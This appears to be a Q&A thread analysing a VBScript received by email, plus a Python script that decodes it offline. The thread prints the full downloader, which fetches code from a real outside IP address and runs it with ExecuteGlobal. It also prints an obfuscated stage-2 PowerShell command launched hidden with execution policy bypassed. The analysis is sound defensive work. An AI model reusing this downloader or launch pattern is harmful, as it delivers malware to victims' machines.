Received Script that is a possible virus. What does it do?


I received an email containing a Visual Basic (.vbs) script. I opened it in a safe environment and found this. What does it do?

    Dim strname, strlength

    ' Decoy: reverses a harmless string by hand; the result (cha) is never used
    strname = "This function is to reverse the tring without using strreverse"
    strlength = len(strname)
    For i = strlength to 1 step -1
        ch = mid(strname,i,1)
        cha = cha&ch
    Next

    ' Downloader: the URL is stored reversed and restored with Strreverse at runtime
    Set filatelismo = CreateObject("WinHttp.WinHttpRequest.5.1")
    arvicultura = Strreverse("txt.cD02/222:15.18.24.5//:ptth")
    filatelismo.Open "GET",arvicultura, False
    filatelismo.Send
    olente = filatelismo.ResponseText

    ' The response body is VBScript and is run in the global scope
    anoneira olente
    Function anoneira(mural)
        ExecuteGlobal mural
    End Function


Dijkgraaf

It downloads a payload from a site and then executes the commands in that payload, so this is just the downloader.

It has the URL of the payload as a reversed string, hence the function Strreverse to reverse a string.

The function anoneira is what it uses to execute the downloaded payload.

user692942

The script is designed to deliver a payload from a remote address and execute its contents.

Here is a breakdown of what it does.

Downloads a text payload from http://5.42.81.51:222/20Dc.txt after some rudimentary attempts to obfuscate it (using a reversed string).

The downloaded payload contains a VBScript that is executed using the ExecuteGlobal command.

Here is the payload that is executed via VBScript using the WScript.Shell Run() method.

    eGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGMDgTrecDgTreBvDgTreEYDgTreQQBiDgTreG8DgTreLwBzDgTreGUDgTrebDgTreBpDgTreGYDgTreLwBvDgTreHIDgTrecDgTreDgTreuDgTreGQDgTrebDgTreBlDgTreGkDgTreaDgTreBzDgTreG8DgTrebgBhDgTreG4DgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreLDgTreDgTregDgTreCcDgTreMDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreFQDgTrecgBlDgTreHYDgTreJwDgTrepDgTreCkDgTrefQB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

The first part is a Base64 encoded string that is manipulated (the character sequence DgTre is replaced with A) before the Base64 is decoded using PowerShell.

The manipulated / decoded Base64 string is then executed using PowerShell:

    powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD

Safe to say this is a malicious script and should not be run. For more details about the specific attack vectors, see this Analysis Report.
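The following Python script is an added example and is not part of either answer or of the posted script. It reproduces, offline and without touching the remote host, the two decoding steps both answers describe: undoing the Strreverse() trick on the stage-1 .vbs to recover the URL, and mirroring the PowerShell decode of stage 2 (replace the DgTre marker with A, Base64-decode, then read the bytes as UTF-16LE, which is what [Text.Encoding]::Unicode means). The full stage-2 string quoted above is cut off at its start, so the script decodes only its trailing fragment (Base64 decodes in 4-character groups, so alignment from the end is valid) and otherwise uses a constructed, benign command as the stand-in input; the SAMPLE_COMMAND value and the encode_like_sample() helper are assumptions made here for demonstration.

```python
import base64
import re

# Stage 1: the line from the posted .vbs that hides the URL as a reversed string.
VBS_SNIPPET = 'arvicultura = Strreverse("txt.cD02/222:15.18.24.5//:ptth")'

# Tail of the stage-2 string quoted in the answer. The quoted string is cut off
# at its start, but Base64 is decodable in 4-character groups aligned from the end.
STAGE2_TAIL = "fQB9DgTreDgTre=="

# Constructed, benign stand-in for the full stage-2 command (not from the page).
SAMPLE_COMMAND = "Write-Host 'constructed benign sample'"


def recover_reversed_strings(vbs_source: str) -> list[str]:
    """Find every Strreverse("...") literal and return its real (reversed) value."""
    pattern = re.compile(r'Strreverse\("([^"]*)"\)', re.IGNORECASE)
    return [m.group(1)[::-1] for m in pattern.finditer(vbs_source)]


def decode_stage2(codigo: str, marker: str = "DgTre") -> str:
    """Mirror the PowerShell decode:
    $codigo.replace('DgTre','A') -> FromBase64String -> Encoding.Unicode.GetString.
    String.Replace in .NET is case-sensitive, as is str.replace here."""
    b64 = codigo.replace(marker, "A")
    # validate=True rejects anything outside the Base64 alphabet, so a wrong
    # marker or a fragment not aligned to 4 characters raises instead of
    # silently returning junk.
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le")


def encode_like_sample(command: str, marker: str = "DgTre") -> str:
    """Inverse of decode_stage2: build an input in the same shape as the sample.
    Used only to produce an offline test input (assumed helper, not on the page)."""
    b64 = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", marker)


def analyze() -> dict:
    """Run both decoding steps and return the recovered values."""
    return {
        "stage1_urls": recover_reversed_strings(VBS_SNIPPET),
        "stage2_tail": decode_stage2(STAGE2_TAIL),
        "sample_roundtrip": decode_stage2(encode_like_sample(SAMPLE_COMMAND)),
    }


if __name__ == "__main__":
    for key, value in analyze().items():
        print(f"{key}: {value!r}")
```

Running it prints the recovered URL http://5.42.81.51:222/20Dc.txt, the string "}}" for the quoted tail (the closing braces of whatever script block the full stage-2 command ends with), and the constructed command round-tripped unchanged. For triage, decoding like this is the safe alternative to letting the PowerShell stage run: it yields the same second-stage text without executing anything.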